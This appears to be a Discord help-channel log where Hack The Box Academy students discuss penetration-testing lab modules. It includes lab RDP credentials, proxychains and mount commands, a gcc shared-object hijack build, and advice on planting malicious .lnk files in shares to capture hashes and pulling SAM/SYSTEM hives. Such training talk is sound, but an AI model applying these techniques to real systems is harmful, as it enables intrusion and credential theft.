sudo proxychains xfreerdp /v:172.16.5.35 /u:mlefay /p:'Simple human work!' /unit:C,*

Hi everyone. I'm going through the Password attacks module and I'm stuck on "Network Services". I'm trying to find the RDP user and password, I used the dictionary from HTB but crackmapexec didn't give me anything.

thanks so much, command "sudo mount -t cifs -o username=<win_share_user> //WIN_SHARE_IP/<share_name> /mnt/win_share" helped. This was due to the size of file.

Hello I am on the broke authentication module and i am on the question On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts?

wlc

Having some trouble on the web fuzzing module, It has told me to search for virtual hosts using gobuster and the common wordlist, but nothing shows up.

I'm not asking for an answer to it, but more what exactly im doing wrong

but I cant seem to find the answer in the module, please can anyone give me a hint

But I've already shared a drive from my machine to windows I imagine I could already pass the base through this method

Yes, and the computer in the foreign network (172.26..) doesn't know how to reach your attack system in 10.129.x.y.

can you double check that its actually asking for gobuster? i think it wants you to fuzz vhost with ffuf. if its gobuster, i've had kinda piss poor experience getting it to properly enum vhosts correctly every time ive attempted to do so. ffuf does a better job for that.

yea start of the question says "using gobuster", should i just use ffuf or should i actually go along with what the module says

i dont necessarily wanna spoil the experience ykwim

Go with the module, i think a header needs to be included in there.

just know in real world, i dont think anyone vhost fuzzes with gobuster, though its a great tool and i prefer it to ffuf, it just doesnt like to work right (for me at least) with vhosts

ah i see

alright thank u

im starting a pwnbox instance ill check for gobuster

see if the header info i mentioned is valid

ffuf requires a header (where to fuzz, vhosts oeprate on host header directives usually)

it alters host header by default

Perfect through trial and error I can already pass the database to sharing a resource of my machine but I am trying to do it with smberver.py and I have not been able to

yeah that may be a builtin feature, but i still think you need to target the header, try this -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'

something like -H 'Host: FUZZ'

added this to the end

but would gobuster use the keyword FUZZ?

im drawing a blank atm (just woke up, still sipping coffee)

Instead of trying to send the database to 10.129.X.Y, can you try sending it to another computer with which it can communicate. How can you leverage what you learned in the pivoting section to get that traffic back to your attack system?

This is a tough one if you don't have a solid understanding of how computers communicate on a network.

the modules ive done have extensively used ffuf, and my gobuster has suffered as a consequence

im trying not to draw from internet examples because i never had any luck with those but maybe a peek at how they handle hosth eaders may help

I think that in this case it would be necessary to take it to the webadmin host which is the point of support with windows and my attacking machine I think that there should be the most obvious to my perception

ok looks like the host header is not STRICTLY required, so best to leave it off and see what results you get

whats weird is it says that it went through 99.8% of the list

why not 100%?

@shell mason for a sanity check remove the --apend-domain from your cmd, and add a -v (for verbose i think?) and check for HTTP status errors or content lengths some filtering may be required

not sure about that 99.8% stuff

👍

if you're seeing a ton of 3XX or 4/5XX errors, (specifically 300s and 400s) you'll need to filter for those in some fashion, either by code or content length(s)

Anyone who has taken the Password Attacks module? I really need some help

yep, a few weeks ago just. where you at?

Take nudges etc to DM please

Not here

👆

my fault OG

I think thats a diff password cracking module, i didnt recognize the specific part you were on

someone else whos worked that one will prob be around soon who can better help.

@quiet trout that

You can send me a DM.

On the API Attacks -> Info Disclosure section a tip is provided for bypassing rate limits with a code snip:

https://academy.hackthebox.com/module/160/section/1474

<?php $whitelist = array("127.0.0.1", "1.3.3.7"); if(!(in_array($_SERVER['HTTP_X_FORWARDED_FOR'], $whitelist))) { header("HTTP/1.1 401 Unauthorized"); } else { print("Hello Developer team! As you know, we are working on building a way for users to see website pages in real pages but behind our own Proxies!"); }

i understand what its doing, but not why... if the HTTP_X_FORWARDED_FOR header does not match the whitelist, and sets the 401 status, does the web server recognize this? is thats all thats necessary to return a 401? why wouldnt the web server return a 201 with the 401 unauth header? is that not how it works? is setting the http header all thats required to return a status code? (alternatively could a custom 404 page be returned with a 201?)

nvm chat gpt gave me a stomachable answer. it looks like the web server does handle this as one would expect and it is technically possible to send conflicting responses but it apparently overrides any default response the web server would send.

stomachable answer, imma use that 😄

is there a way to reset module progress if i havent touched it in months and want to start over?

yeah it also works as a precautionary flame suit in case chatgpt gave me total bullshit, which is usually the case.

I don't think there is an option for that.

You could always reach out to support and see if that's something they can do.

yeah fair enough. i guess i could also just try not to look at the answers

Depending on where you are some section questions and answers have been updated, so those answers wouldn't match up. But yeah I mean that should work.

The steps leading up to the answer are just as important

so take the chance to make good notes

Did anyone finish SA 1 from intro to whitebox? I managed to get the auth token, and I think I know where the ||code injection|| is, but I do not know how to extract the /flag.txt from it

Module: Network Enumeration with Nmap
Section: Host and Port Scanning
Hey, I'm really struggling with the second task in this section:
Enumerate the hostname of your target and submit it as the answer. (case-sensitive)
I've tried using the following flags:
-A
-sC -sV
and I got some kind of a flag, but it's not the correct answer. What am i doing wrong?

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 08:09 CDT
Nmap scan report for 10.129.2.49
Host is up (0.0087s latency).

PORT      STATE SERVICE VERSION
31337/tcp open  Elite?
| fingerprint-strings: 
|   GetRequest: 
|_    220 HTB{SOME-FLAG-HERE}

Module: Linux Privilege Escalation
Section: Shared Libraries
Link to section: https://academy.hackthebox.com/module/51/section/475

Can someone please explain to me in what scenario the privilege escalation method discussed in this section would not work? Or does it always work as long as the user has sudo rights (this doesn't sound right)? 🤔

If you've used the flags -sV -sC -A, then I have a good feeling that the hostname is likely in your output. Have you checked the output properly?

There is a flag, but when I copy it into the reply box it is incorrect

The question has asked you for the target's hostname, they never said flag.

the user need to have rights to restart a privileged process that reads shared libraries from the libraries env path

tbh I've not seen this vector outside of this exercise

Wdym by "libraries env path"? Are you referring to the LD_PRELOAD variable?

yeah

I have noticed something different. When I run sudo -l, I get this in the output env_keep+=LD_PRELOAD. Do you think this is a good indication to try out this vector?

I see.

probably, but yeah this is not common

Understood, thanks.

Btw @next bronze the Linux priv esc module has a suggested completion duration of 8 hours. Is it just me or does it take a lot longer than that?

pretty sure it took me more than 8 when I did it

Ahh okay, good to know. I thought it was just me, I've been on it a couple days, not doing it all day though, have had other things come up.

yeah just take your time, the suggestions are just suggestions

Got Windows Priv esc after this 🫠

Module: Linux Privilege Escalation
Section: Shared Object Hijacking
Link to section: https://academy.hackthebox.com/module/51/section/476

In the section there's this command:

cp /lib/x86_64-linux-gnu/libc.so.6 <REDACTED>

Is the .6 in /lib/x86_64-linux-gnu/libc.so.6 a mistake?

Hi

im doing "using the metasploit framework module." (section modules) and im stuck in this exercise:" Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer." no matter how I try, when it comes to exploit part it always showing : Exploit completed, but no session was created." can anyone explain me why?

I believe there are couple of EternalRomance exploits in metasploit, make sure to try them all, and make sure to set the options correctly, like LHOST, LPORT, etc...

https://academy.hackthebox.com/module/67/section/630
Section: Interacting with Users

Help, I don't understand at all what to do in this module. He breaks my might.
I don't understand how to get a hash.

Which was the hardest module for you in the pentester path?

I tried everything but no results

make sure that VPN is connected properly

For info-gathering web edition does anyone have any clues to answer the skill assessment "What is the API key in the hidden admin directory that you have discovered on the target system"? I ran dnsenum, ffuf and ffuf recursively along with gobuster

If you want a nudge DM me , with the steps that you have taken so far

https://packages.debian.org/unstable/libc6

this section focuses on the idea of stealing credentials in unique ways in Windows environments, from the hint it asks you to find a writable share by the current user (Netexec & CrackMapExec are great tools for that purpose)

Hello everyone, I am stuck and struggling to find informations on the module "Dynamic Port Forwarding with SSH and SOCKS Tunneling"
https://academy.hackthebox.com/module/158/section/1426
I have an issue with proxychains, as I have all hosts down when I scan the target with nmap after having a dynamic port forward made with ssh -D 9050 ubuntu@[IP]

then I either use -Pn on a specific open host, and I have no services up, or I try -sn with a range

Thanks in advance

Ah, thanks. I also just noticed that it wasn't a mistake.

uploading something in that writable share will trigger another thing in responder then you should easily get the answer to the question

nothing

Yes, I kind of do it. 😦

I just got something, I use the 3rd method. But I capture my own logs.

you should upload a Malicious File to any writable share available and wait couple of minutes, and smbclient is a great tool for that

the problem is that I don't understand which file to take for the attack

you only have a handful of them used in the section, upload all of them and one will certainly work, wait couple of minutes for the trigger to take place

make sure you upload in the right place

and this is not the one

How should I understand which folder is in this module? right

think about it , you should upload a file to a share

is that a share ?

C:\Department Shares\Public

you could try

I download all the files through this folder

download why ?

re-read the section

I have serious connectivity issues with modules. Where should I direct that?

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

That's not my problem. The problem is that reading the module, I don't understand how to use what they want in the module. Whether it's Generating a Malicious .lnk File

you need to generate a malicious .lnk file , then make your target running it as simple as that

I think i got a flag the wrong way, could someone point me to the right direct way?

Got the crednetials to the user and to find the ip of the reffered machine i scanned the network with nmap, found 3 hosts and rdp'ed to first one

Although given the flag i should have ||audited group memberships||.

yeah that's fine

I didnt audit any group memberships though, what did I miss then?

Can you tell me in which folder the file should be uploaded? I don't understand what folder is needed for this module. I just don't see it in the module description or on the C drive

you should find it yourself

Should probably read up on the exploit you're performing and why it works in the first place instead of asking for direct handholding.

nothing wrong with asking for help

I just went through folders at random and grabbed the right hash

🫡

Tbh if u got the flag that's the only thing that matters

Hi im stuck on the OSINT: Corperate Recon > Cloud Storage Question: Investigate the website and find the bucket name of AWS that the company used and submit it as the answer. (Format: sub.domain.tld)
I have been looking in on the website souce code and using tools like ip2provider but am unable to get the bucket name of AWS the inlanefreight.com uses.

you can check after to find out why your way worked

check the website source code, grep for s3

so use curl and grep?

ill try it out

yep

Got no output 😦

just used the same method on a couple other pages on the website and found it thanks for the help @next bronze

btw I figured out how to solve my problem of 'resetting' the module. I used TamperMonkey and GPT helped me write some JavaScript to blank completed answers out unless I hover over them.

Please can someone help me with this qustion in the broken authentication module On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts?

I cant seem to find the answer

Reread that section. The answer is there.

Please can you give me a hint on where to look ive read and re read the section but cant find it

Maybe try to keyword search for it. If you don't understand what I mean by that let me know.

cant talk in offtopic

does anyone know

Hey. Welcome. Read #welcome and it’ll explain why and tell you exactly what to do

hey goblins frnd

nice to meet u

Nice to meet you too

wish i were goblin friend

goblin is a sweetheart

@ocean night gobby im here

Hey @rustic sage 👋

nice to be here

If you want to chat in #general you'll need to follow the instructions in #welcome 🙂
Happy to have you

bet

Lol

Hi there, I am currently doing the "Active Directory Penetration Tester" path. Is the knowledge gained here good for OSCP?

IIRC that path is out of scope for OSCP, but i could be wrong

its overkill for OSCP as far as I know

Can some one help me with the Pillaging module?

**Find the configuration file for the application you identify and attempt to obtain the credentials for the user Grace. What is the password for the local account, Grace? **

Tried the example with the 6 available password nodes in the confCons file and their backup

If I would complete the path, OSCP should be easier? Or is there way different stuff being explained in this path?

yep definitely out of scope

I think CPTS is more relevant in that case

you'll be learning stuff that likely won't get tested

Ah ok thanks guys!

Can I ask for module help in this channel?

yes

That knowledge is beyond OSCP

The command I mentioned earlier, in the module section... why does it copy libc as libshared??

certainly beyomd.

lol

i liked that typing fumble.

or typo

this happen all the time with me.

yeah , I made too much typos

some time make bor 🐷 of bro

check the previous command, the binary is trying to load libshared.so

I don't get what you're saying? 😅

I can see that libshared.so is one of the dependencies. Why is it copying it as the name of another dependency though?

it's explained in the section

Oh, is it so it throws the error about dbquery()?

And then we can redefine it to suit our needs?

yes so you know which function it's trying to call, and you can make that functon a shell or whatever

Got it, thanks. Sry for the trouble.

technically you can just decomple the program too

or do a strace

Oh, noted. What would you use to decompile?

lol there's an emoji for that?

In what instances does this privilege escalation vector not work?

if you can run the program as sudo, or if it contains some important data you can exploit or if it communicates with other important processes

but that's going into RE as you'd need to understand what it actually does beyond just making it run a shell

That's quite a wide range to cover.

yep that's binexp and RE, for cpts you'd just need to understand the senario given in the module

Also, the question at the end of the section has already carried out all the steps? So, I have to delete the library it compiled if I want to redo the steps?

has it? you can compile a new one

Yeah, apparently so 😂

I just redid it, so it's all good.

I chatGPT'ed this command but I still don't quite get it. Do you happen to understand the parameters?

gcc src.c -fPIC -shared -o <REDACTED FILE PATH>

-fPIC and -shared specifically.

when in doubt consule the manual https://gcc.gnu.org/onlinedocs/gcc/Option-Summary.html

but -shared is to create a shared library .so file

Read it and now my brain hurts 🤣

Seems to work even without the fPIC flag

Prolly best to stick with it though based on the little I understand from GPT's explanation.

Hello All,
I'm new to HackTheBox, Is it safe to download files directly to my local laptop, or is there a risk of spreading malware? I'd appreciate any suggestions on how to download them safely.

Bro what at are u asking it? 😭

Just doing my best to understand what it is I'm running 🫠

Atleast you going in the right direction 😉

From what I understand, fPIC makes the shared library be able to get loaded from anywhere in memory that the program chooses.

That’s why this worked without it, because only one program was using it at that time. If multiple were using it at the same time, there would probably be a memory conflict

https://academy.hackthebox.com/module/67/section/1637
Question I'm right to go to the site through my browser. The second I don't see as in example "d" cookies. After looking at other cookies, I also did not find anything suitable

you'll need to add it yourself after extracting them from the target

It's just that the task also says that I must use a browser on an RDP connection. But there is no Internet there.

well have you tried accessing?

what's the domain given in the question?

I understand what you mean. I'll try.

do you guys also think this is a rabithole 😅

inlanefreight .slack .com I tried how it was on one of the examples. But it still doesn't work

regarding API enumeration, some of the API labs have you start off with a get req and/or curl -X OPTIONS ... to the api endpoint... is the info returned (if any) to be udnerstood as options for the entire API? all endpoints belonging to the API? (you wouldnt say... curl -X OPTIONS ../api/userinfo or ,../api/groupinfo and expect differening http methods allowed/disallowed on different endpoints?

added into the hosts?

on rdp no internet

i see

try on local system (VM) cause its .com

not sure might work

It's just that the task tells me what to do via RDP, and when I do it through my browser, I don't capture the cookies I want.

I need help with Zephyr initial foothold. Anyone?

#1263635449335910531

wrong channel

a month ago i had a link from snapchat and i could put in peoples old usernames and it would show their new usernames they changed it too does anyone know what this link is?

I'm getting a bit fed up with RDP on AD machines...

[16:05:28:351] [83225:83226] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[16:05:28:351] [83225:83226] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[16:05:28:351] [83225:83226] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

Doesn't matter if I try immediately after spawn, 10min after spawn of 45min...

Any idea?

Command was: xfreerdp /v:10.129.253.234 /u:htb-student /p:'Academy_student_DA!' /dynamic-resolution

well i also got disconneted from the rdp and not connecting back

trying to get new ip and see if that works

Already went through 4 reset, let me know if you get in

Im in

Should i ?

Probably not hahaha

Still doesn't work here...

Guys need help with this before i go to sleep i got this flag but its not accepting {e4...2a}

https://academy.hackthebox.com/module/24/section/160

I have a different flag

So I guess you got it wrong somewhere

Is there any reason why
Cross-Site Scripting (XSS) —> DOM XSS —> Questions
returns two flags, one of which is correct?

isn't the point of this excercise to upload the file on win and unzip there?

can try by submitting both? how's that idea?

Yes it is

its same on my base machine and on RDP win too

I have completed the task. I need to know if there is any technical purpose or something like that.

ok got it for that i can't answer i hope someone will responce on your request.

That might be a flag for another section

can i dm?

Sure

Just had one question about this part.

is it normal for sharpup.exe to show you that you can modify a binary and when you check that binary you find its not permissible to you to (stop,write,modify) the service only start and execute (its been the case with manual operations as well)?

Hello! I'm having some touble with the Bash Scripting module at flow control - loops. I can't get the code to work...

for i in {1..28}; do
var=$(echo -n $var | base64)
done

salt=${#var}

I get something like bad decrypt

If someone can help, that would be very much appreciated

Is that the whole code?

you define var with var, is it initialised for the first iteration?

ways to transfer file from windows to kali?. smbserver is not working.

base64 / scp / webserver + wget

https://academy.hackthebox.com/module/67/section/1637
I need a hint. I got a backup, but how do I get a hash. I understand I need to send a SAM and SYSTEM file to my Kali but I can't find a way how to do it.

The for loop is the part I've added. I even tried it for each i, but it still doesn't work

Take that to DM please.

can you give me a hint

I cannot, sorry

If you're having issues with a specific section or module, I'd recommend reading back over the train ing material, taking notes and applying it to your attempts on the evaluation steps.

So I read the module again. But it doesn't say how to get a hash after we made a backup

wassup guys , day 1 vip, not having the best of luck with my first module.

I have gotten many awnsers with many scripts but none of them work 😦

Hey , can someone help with Windows PrivEs skilss asses 1 ?

does not start with e

You can DM me what you have tried.

@acoustic owl You have powers now?

In windows priv esc communication with processes
At the end they just tell you about named pipes and link a msf exploit Without showing privesc?

unable to run rubeus.exe. it says this version is not designed to run on this system. Tried powerview script. it also shows the hell of errors. doing ad enumeration skill assesment

<@&861185840277487616>

Thanks

Let's keep government affairs out of this @midnight galleon

funny amount of errors, when running powerview.ps1

It should work, unless you had a problem in uploading file or you are using a very old powershell version

Can anyone help me with the noSql injections skills assessment 2? I am very stuck.

Does anyone have anything that can help me complete Intro to assembly language skills assessment question 2: I’ve been on it for 2 days. I’m able to send the shell out to the listening port on the target server but it fails to run.